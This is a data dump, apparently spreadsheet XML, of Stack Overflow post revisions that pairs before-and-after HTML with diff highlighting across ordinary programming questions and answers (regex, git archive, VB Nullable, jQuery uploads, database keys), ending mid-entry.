 &lt;pre class="default s-code-block hljs less"&gt;&lt;code&gt;\&lt;span class="hljs-selector-tag"&gt;b&lt;/span&gt;(https?|ftp|file):&lt;span class="hljs-comment"&gt;//[-A-&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-comment"&gt;Za-z0&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-comment"&gt;-9+&amp;amp;@#/%?=~_|!:,.;]*[-A-&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-comment"&gt;Za-z0&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-comment"&gt;-9+&amp;amp;@#/%=~_|]&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It matches these below (inside the &lt;code&gt;** **&lt;/code&gt; marks):&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;**http:&lt;span class="hljs-comment"&gt;//www.regexbuddy.com**  &lt;/span&gt;_x000D_
**http:&lt;span class="hljs-comment"&gt;//www.regexbuddy.com/**  &lt;/span&gt;_x000D_
**http:&lt;span class="hljs-comment"&gt;//www.regexbuddy.com/index.html**  &lt;/span&gt;_x000D_
**http:&lt;span class="hljs-comment"&gt;//www.regexbuddy.com/index.html?source=library**  &lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You can download RegexBuddy at &lt;strong&gt;&lt;a href="http://www.regexbuddy.com/download.html" rel="nofollow noreferrer"&gt;http://www.regexbuddy.com/download.html&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's what &lt;a href="http://en.wikipedia.org/wiki/RegexBuddy" rel="nofollow noreferrer"&gt;RegexBuddy&lt;/a&gt; uses.&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs less"&gt;&lt;code&gt;\&lt;span class="hljs-selector-tag"&gt;b&lt;/span&gt;(https?|ftp|file):&lt;span class="hljs-comment"&gt;//[-A-&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-comment"&gt;Z0&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-comment"&gt;-9+&amp;amp;@#/%?=~_|!:,.;]*[-A-&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-comment"&gt;Z0&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-comment"&gt;-9+&amp;amp;@#/%=~_|]&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It matches these below (inside the &lt;code&gt;** **&lt;/code&gt; marks):&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;**http:&lt;span class="hljs-comment"&gt;//www.regexbuddy.com**  &lt;/span&gt;_x000D_
**http:&lt;span class="hljs-comment"&gt;//www.regexbuddy.com/**  &lt;/span&gt;_x000D_
**http:&lt;span class="hljs-comment"&gt;//www.regexbuddy.com/index.html**  &lt;/span&gt;_x000D_
**http:&lt;span class="hljs-comment"&gt;//www.regexbuddy.com/index.html?source=library**  &lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You can download RegexBuddy at &lt;strong&gt;&lt;a href="http://www.regexbuddy.com/download.html" rel="nofollow noreferrer"&gt;http://www.regexbuddy.com/download.html&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Tilman Hausherr</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Probably the simplest way to achieve this is with &lt;code&gt;git archive&lt;/code&gt;. If you really need just the expanded tree you can do something like this.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git archive master | tar -x -C /somewhere/else_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Most of the time that I need to 'export' something from git, I want a compressed archive in any case so I do something like this.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git archive master | bzip2 &amp;gt;source-tree.tar.bz2_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; ZIP archive:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git archive &lt;span class="diff-delete"&gt;master &lt;/span&gt;--format zip --output /full/path/to/zipfile.zip master _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;git help archive&lt;/code&gt; for more details, it's quite flexible.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Probably the simplest way to achieve this is with &lt;code&gt;git archive&lt;/code&gt;. If you really need just the expanded tree you can do something like this.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git archive master | tar -x -C /somewhere/else_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Most of the time that I need to 'export' something from git, I want a compressed archive in any case so I do something like this.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git archive master | bzip2 &amp;gt;source-tree.tar.bz2_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; ZIP archive:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git archive --format zip --output /full/path/to/zipfile.zip master _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;git help archive&lt;/code&gt; for more details, it's quite flexible.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>CB Bailey</t>
  </si>
  <si>
    <t>Johnno Nolan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Partly because the file systems expect &lt;code&gt;&lt;span class="diff-delete"&gt;NULL&lt;/span&gt;&lt;/code&gt; (&lt;span class="diff-delete"&gt;'&lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;\0&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;'&lt;/span&gt;) bytes to terminate file names, so &lt;code&gt;&lt;span class="diff-delete"&gt;UTF-16&lt;/span&gt;&lt;/code&gt; would not work well. You'd have to modify a lot of code to make that change.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Partly because the file systems expect &lt;span class="diff-add"&gt;NUL&lt;/span&gt; (&lt;span class="diff-add"&gt;'\0'&lt;/span&gt;) bytes to terminate file names, so &lt;span class="diff-add"&gt;UTF-16&lt;/span&gt; would not work well. You'd have to modify a lot of code to make that change.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jonathan Leffler</t>
  </si>
  <si>
    <t>Skynet</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;What's&lt;/span&gt; the best stable &lt;span class="diff-delete"&gt;C++ IDE&lt;/span&gt; with &lt;span class="diff-delete"&gt;a GUI that runs on&lt;/span&gt; linux?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;what's&lt;/span&gt; the best stable &lt;span class="diff-add"&gt;(editor &amp;amp; compiler) for c plus plus&lt;/span&gt; with &lt;span class="diff-add"&gt;gui &amp;amp; work under&lt;/span&gt; linux?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sebastian Mach</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Value Types can't be null. It violates what it means to be a Value Type. You can wrap Value Types as Nullable(Of T) which gives you a great set of methods, and checks for Nothing do work. But you do have a lot of overhead with that wrapper. Perhaps you can clarify what you're trying to do?&lt;/p&gt; _x000D_
 &lt;p&gt; For completeness the VB syntax for Nullable wrappers is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Dim i as Nullable(Of Integer) = Nothing '.NET 2.0/3.0'_x000D_
Dim j as Integer? = Nothing '.NET 3.5'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; EDIT: Value Type are always preinitialized to a default value, 0 for numerics, false for Booleans, etc.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Value Types can't be null. It violates what it means to be a Value Type. You can wrap Value Types as Nullable(Of T) which gives you a great set of methods, and checks for Nothing do work. But you do have a lot of overhead with that wrapper. Perhaps you can clarify what you're trying to do?&lt;/p&gt; _x000D_
 &lt;p&gt; For completeness the VB syntax for Nullable wrappers is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Dim i as Nullable(Of Integer) = Nothing '.NET 2.0/3.0'_x000D_
Dim j as Integer? = Nothing '.NET 3.5'_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Bob King</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;I like it just due to the consistency&lt;/span&gt;. &lt;span class="diff-delete"&gt; I think code would be much&lt;/span&gt; more difficult to read if "foo", "Foo", "fOO", and "fOo" &lt;span class="diff-delete"&gt;were all interchangeable&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; SOME PEOPLE WOULD WRITE EVERYTHING IN ALL CAPS, MAKING EVERYTHING LESS READABLE.&lt;/p&gt; _x000D_
 &lt;p&gt; Case sensitivity makes it easy to use the "same name" in different ways, according to a capitalization convention, e.g.,&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Foo foo = ...  // "Foo" is a type, "foo" is a variable with that type_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Consistency&lt;/span&gt;. &lt;span class="diff-add"&gt; Code is&lt;/span&gt; more difficult to read if "foo", "Foo", "fOO", and "fOo" &lt;span class="diff-add"&gt;are considered to be identical&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; SOME PEOPLE WOULD WRITE EVERYTHING IN ALL CAPS, MAKING EVERYTHING LESS READABLE.&lt;/p&gt; _x000D_
 &lt;p&gt; Case sensitivity makes it easy to use the "same name" in different ways, according to a capitalization convention, e.g.,&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Foo foo = ...  // "Foo" is a type, "foo" is a variable with that type_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Kristopher Johnson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; One thing that I have done in the past (in JavaScript not jQuery), in the above my JavaScript imports, is output the dynamic controls ID's similiar to what toohool recommends and assign them to variables that I reference in my script imports.&lt;/p&gt; _x000D_
 &lt;p&gt; Something like this, should allow you to take advantage of caching and still enable you to have the exact client IDs:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;head&amp;gt;_x000D_
    &amp;lt;script type="text/javascript&amp;gt;_x000D_
        var cboPanesID = &amp;lt;%= cboPanes.ClientID %&amp;gt;;_x000D_
    &amp;lt;/script&amp;gt;_x000D_
    _x000D_
    &amp;lt;!-- this JS import references cboPanesID variable declared above &lt;span class="diff-delete"&gt;!&lt;/span&gt;--&amp;gt;_x000D_
    &amp;lt;script src="jquery.plugin.js"&amp;gt;&amp;lt;/script&amp;gt;_x000D_
&amp;lt;/head&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; One thing that I have done in the past (in JavaScript not jQuery), in the above my JavaScript imports, is output the dynamic controls ID's similiar to what toohool recommends and assign them to variables that I reference in my script imports.&lt;/p&gt; _x000D_
 &lt;p&gt; Something like this, should allow you to take advantage of caching and still enable you to have the exact client IDs:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;head&amp;gt;_x000D_
    &amp;lt;script type="text/javascript&amp;gt;_x000D_
        var cboPanesID = &amp;lt;%= cboPanes.ClientID %&amp;gt;;_x000D_
    &amp;lt;/script&amp;gt;_x000D_
    _x000D_
    &amp;lt;!-- this JS import references cboPanesID variable declared above --&amp;gt;_x000D_
    &amp;lt;script src="jquery.plugin.js"&amp;gt;&amp;lt;/script&amp;gt;_x000D_
&amp;lt;/head&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Eric Schoonover</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I know that "internal" modifier limits access to the current assembly&lt;span class="diff-delete"&gt;, but&lt;/span&gt; when could I need it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Would you explain, please, what are practical usings of "internal" keyword in C#?&lt;/span&gt; I know that "internal" modifier limits access to the current assembly&lt;span class="diff-add"&gt;. But&lt;/span&gt; when could I need it?&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks!&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Alexander Prokofyev</t>
  </si>
  <si>
    <t>Ryan Kohn</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to upload a file asynchronously &lt;strong&gt;&lt;span class="diff-delete"&gt;with jQuery&lt;/span&gt;&lt;/strong&gt;. This is my HTML:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&amp;lt;span&amp;gt;File&amp;lt;/span&amp;gt;_x000D_
&lt;span class="xml"&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;input&lt;/span&gt; &lt;span class="hljs-attr"&gt;type&lt;/span&gt;=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; &lt;span class="hljs-attr"&gt;name&lt;/span&gt;=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; &lt;span class="hljs-attr"&gt;size&lt;/span&gt;=&lt;span class="hljs-string"&gt;"10"&lt;/span&gt;/&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="xml"&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;input&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"uploadbutton"&lt;/span&gt; &lt;span class="hljs-attr"&gt;type&lt;/span&gt;=&lt;span class="hljs-string"&gt;"button"&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Upload"&lt;/span&gt;/&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And here my &lt;code&gt;Jquery&lt;/code&gt; code:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;$(&lt;span class="hljs-built_in"&gt;document&lt;/span&gt;).ready(&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; (&lt;span class="hljs-params"&gt;&lt;/span&gt;) &lt;/span&gt;{_x000D_
    $(&lt;span class="hljs-string"&gt;"#uploadbutton"&lt;/span&gt;).click(&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; (&lt;span class="hljs-params"&gt;&lt;/span&gt;) &lt;/span&gt;{_x000D_
        &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; filename = $(&lt;span class="hljs-string"&gt;"#file"&lt;/span&gt;).val();_x000D_
_x000D_
        $.ajax({_x000D_
            &lt;span class="hljs-attr"&gt;type&lt;/span&gt;: &lt;span class="hljs-string"&gt;"POST"&lt;/span&gt;,_x000D_
            &lt;span class="hljs-attr"&gt;url&lt;/span&gt;: &lt;span class="hljs-string"&gt;"addFile.do"&lt;/span&gt;,_x000D_
            &lt;span class="hljs-attr"&gt;enctype&lt;/span&gt;: &lt;span class="hljs-string"&gt;'multipart/form-data'&lt;/span&gt;,_x000D_
            &lt;span class="hljs-attr"&gt;data&lt;/span&gt;: {_x000D_
                &lt;span class="hljs-attr"&gt;file&lt;/span&gt;: filename_x000D_
            },_x000D_
            &lt;span class="hljs-attr"&gt;success&lt;/span&gt;: &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; (&lt;span class="hljs-params"&gt;&lt;/span&gt;) &lt;/span&gt;{_x000D_
                alert(&lt;span class="hljs-string"&gt;"Data Uploaded: "&lt;/span&gt;);_x000D_
            }_x000D_
        });_x000D_
    });_x000D_
});_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Instead of the file being uploaded, I am only getting the filename. What can I do to fix this problem?&lt;/p&gt; _x000D_
 &lt;h3&gt;Current Solution&lt;/h3&gt; _x000D_
 &lt;p&gt; I am using the &lt;a href="http://malsup.com/jquery/form/#code-samples" rel="nofollow noreferrer"&gt;jQuery Form Plugin&lt;/a&gt; to upload files.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to upload a file asynchronously &lt;span class="diff-add"&gt;with jQuery&lt;/span&gt;. This is my HTML:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&amp;lt;span&amp;gt;File&amp;lt;/span&amp;gt;_x000D_
&lt;span class="xml"&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;input&lt;/span&gt; &lt;span class="hljs-attr"&gt;type&lt;/span&gt;=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; &lt;span class="hljs-attr"&gt;name&lt;/span&gt;=&lt;span class="hljs-string"&gt;"file"&lt;/span&gt; &lt;span class="hljs-attr"&gt;size&lt;/span&gt;=&lt;span class="hljs-string"&gt;"10"&lt;/span&gt;/&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="xml"&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;input&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"uploadbutton"&lt;/span&gt; &lt;span class="hljs-attr"&gt;type&lt;/span&gt;=&lt;span class="hljs-string"&gt;"button"&lt;/span&gt; &lt;span class="hljs-attr"&gt;value&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Upload"&lt;/span&gt;/&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And here my &lt;code&gt;Jquery&lt;/code&gt; code:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;$(&lt;span class="hljs-built_in"&gt;document&lt;/span&gt;).ready(&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; (&lt;span class="hljs-params"&gt;&lt;/span&gt;) &lt;/span&gt;{_x000D_
    $(&lt;span class="hljs-string"&gt;"#uploadbutton"&lt;/span&gt;).click(&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; (&lt;span class="hljs-params"&gt;&lt;/span&gt;) &lt;/span&gt;{_x000D_
        &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; filename = $(&lt;span class="hljs-string"&gt;"#file"&lt;/span&gt;).val();_x000D_
_x000D_
        $.ajax({_x000D_
            &lt;span class="hljs-attr"&gt;type&lt;/span&gt;: &lt;span class="hljs-string"&gt;"POST"&lt;/span&gt;,_x000D_
            &lt;span class="hljs-attr"&gt;url&lt;/span&gt;: &lt;span class="hljs-string"&gt;"addFile.do"&lt;/span&gt;,_x000D_
            &lt;span class="hljs-attr"&gt;enctype&lt;/span&gt;: &lt;span class="hljs-string"&gt;'multipart/form-data'&lt;/span&gt;,_x000D_
            &lt;span class="hljs-attr"&gt;data&lt;/span&gt;: {_x000D_
                &lt;span class="hljs-attr"&gt;file&lt;/span&gt;: filename_x000D_
            },_x000D_
            &lt;span class="hljs-attr"&gt;success&lt;/span&gt;: &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; (&lt;span class="hljs-params"&gt;&lt;/span&gt;) &lt;/span&gt;{_x000D_
                alert(&lt;span class="hljs-string"&gt;"Data Uploaded: "&lt;/span&gt;);_x000D_
            }_x000D_
        });_x000D_
    });_x000D_
});_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Instead of the file being uploaded, I am only getting the filename. What can I do to fix this problem?&lt;/p&gt; _x000D_
 &lt;h3&gt;Current Solution&lt;/h3&gt; _x000D_
 &lt;p&gt; I am using the &lt;a href="http://malsup.com/jquery/form/#code-samples" rel="nofollow noreferrer"&gt;jQuery Form Plugin&lt;/a&gt; to upload files.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Kevin B</t>
  </si>
  <si>
    <t>Suraj Rao</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Currently, I'm in the process of hiring a web developer who will be working on a site that processes credit cards. While he won't have the credentials to log into the payment gateway's UI he will have access to the API login and transaction key since it's embedded in the application's code.&lt;/p&gt; _x000D_
 &lt;p&gt; I'd like to be aware of all the "what if" scenarios pertaining to the type of damage one could do with that information. Obviously, he can process credit cards but the money goes into the site owner's bank account so I'm not sure how much damage that could cause. Can anyone think of any other possible scenarios?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Currently, I'm in the process of hiring a web developer who will be working on a site that processes credit cards. While he won't have the credentials to log into the payment gateway's UI he will have access to the API login and transaction key since it's embedded in the application's code.&lt;/p&gt; _x000D_
 &lt;p&gt; I'd like to be aware of all the "what if" scenarios pertaining to the type of damage one could do with that information. Obviously, he can process credit cards but the money goes into the site owner's bank account so I'm not sure how much damage that could cause. Can anyone think of any other possible scenarios?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; UPDATE: The payment gateway being used is Authorize.net.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Lauren</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm designing a small SQL database to be used by a web application.&lt;/p&gt; _x000D_
 &lt;p&gt; Let's say a particular table has a field&lt;span class="diff-delete"&gt;, &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Name&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt;,&lt;/span&gt; for which no two rows will be allowed to have the same value. &lt;span class="diff-delete"&gt;However&lt;/span&gt;, users will be able to change field&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Name&lt;/span&gt;&lt;/em&gt; at any time.&lt;/p&gt; _x000D_
 &lt;p&gt; The primary key from this table will be used as a foreign key in other tables. &lt;span class="diff-delete"&gt;So&lt;/span&gt; if field&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Name&lt;/span&gt;&lt;/em&gt; was used as the &lt;span class="diff-delete"&gt;primary key&lt;/span&gt;, any changes would need to be propogated to those other tables. &lt;span class="diff-delete"&gt;On&lt;/span&gt; the other hand, the uniqueness requirement would be handled automatically.&lt;/p&gt; _x000D_
 &lt;p&gt; My instinct would be to add an integer field to act as the &lt;span class="diff-delete"&gt;primary key&lt;/span&gt;, which could be automatically populated by the database. &lt;span class="diff-delete"&gt;Is&lt;/span&gt; there &lt;span class="diff-delete"&gt;a&lt;/span&gt; point in having this field or would it be a waste of time?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm designing a small SQL database to be used by a web application.&lt;/p&gt; _x000D_
 &lt;p&gt; Let's say a particular table has a&lt;span class="diff-add"&gt; Name&lt;/span&gt; field for which no two rows will be allowed to have the same value. &lt;span class="diff-add"&gt; However&lt;/span&gt;, users will be able to change&lt;span class="diff-add"&gt; the Name&lt;/span&gt; field at any time.&lt;/p&gt; _x000D_
 &lt;p&gt; The primary key from this table will be used as a foreign key in other tables. &lt;span class="diff-add"&gt; So&lt;/span&gt; if&lt;span class="diff-add"&gt; the Name&lt;/span&gt; field was used as the &lt;span class="diff-add"&gt;PK&lt;/span&gt;, any changes would need to be propogated to those other tables. &lt;span class="diff-add"&gt; On&lt;/span&gt; the other hand, the uniqueness requirement would be handled automatically.&lt;/p&gt; _x000D_
 &lt;p&gt; My instinct would be to add an integer field to act as the &lt;span class="diff-add"&gt;PK&lt;/span&gt;, which could be automatically populated by the database. &lt;span class="diff-add"&gt; Is&lt;/span&gt; there &lt;span class="diff-add"&gt;any&lt;/span&gt; point in having this field or would it be a waste of time?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mark Pattison</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Has anyone ever had the issue where trying to "View Designer" on a windows form in Visual Studio .NET causes the error: "Could not load file or assemblyâ€¦" ?&lt;/p&gt; _x000D_
 &lt;p&gt; In this case, the assembly in question was XYZ.dll. I managed to fix this by adding XYZ.dll and all its references to my project's references (even though my project doesn't directly depend on them) and rebuilding the whole solution. However, after that, I removed all those references from my project, rebuilt, and it still worked.&lt;/p&gt; _x000D_
 &lt;p&gt; One other piece of information is that I use Resharper 2.5. Someone else pointed out that it might be Resharper doing some shadow copying. I'll look into this next time this happens. Does anyone have a understanding of why this error happens in the first place, and possibly the 'correct' way to fix it?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Thanks for the responses so far!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; One other piece of information is that I use Resharper 2.5. Someone else pointed out that it might be Resharper doing some shadow copying. I'll look into this next time this happens.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Has anyone ever had the issue where trying to "View Designer" on a windows form in Visual Studio .NET causes the error: "Could not load file or assemblyâ€¦" ?&lt;/p&gt; _x000D_
 &lt;p&gt; In this case, the assembly in question was XYZ.dll. I managed to fix this by adding XYZ.dll and all its references to my project's references (even though my project doesn't directly depend on them) and rebuilding the whole solution. However, after that, I removed all those references from my project, rebuilt, and it still worked.&lt;/p&gt; _x000D_
 &lt;p&gt; One other piece of information is that I use Resharper 2.5. Someone else pointed out that it might be Resharper doing some shadow copying. I'll look into this next time this happens. Does anyone have a understanding of why this error happens in the first place, and possibly the 'correct' way to fix it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>ChrisF ?</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Windows&lt;/span&gt; does not guarantee atomic file &lt;span class="diff-delete"&gt;metadata&lt;/span&gt; operations. &lt;span class="diff-delete"&gt;I'd&lt;/span&gt; provide a citation, but there is none - that fact that there's no written or documented guarantee means as much.&lt;/p&gt; _x000D_
 &lt;p&gt; You're going to have to write your own routines to support this. &lt;span class="diff-delete"&gt;It's&lt;/span&gt; unfortunate, but you can't expect &lt;span class="diff-delete"&gt;Windows&lt;/span&gt; to provide this level of service - it simply wasn't designed for it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
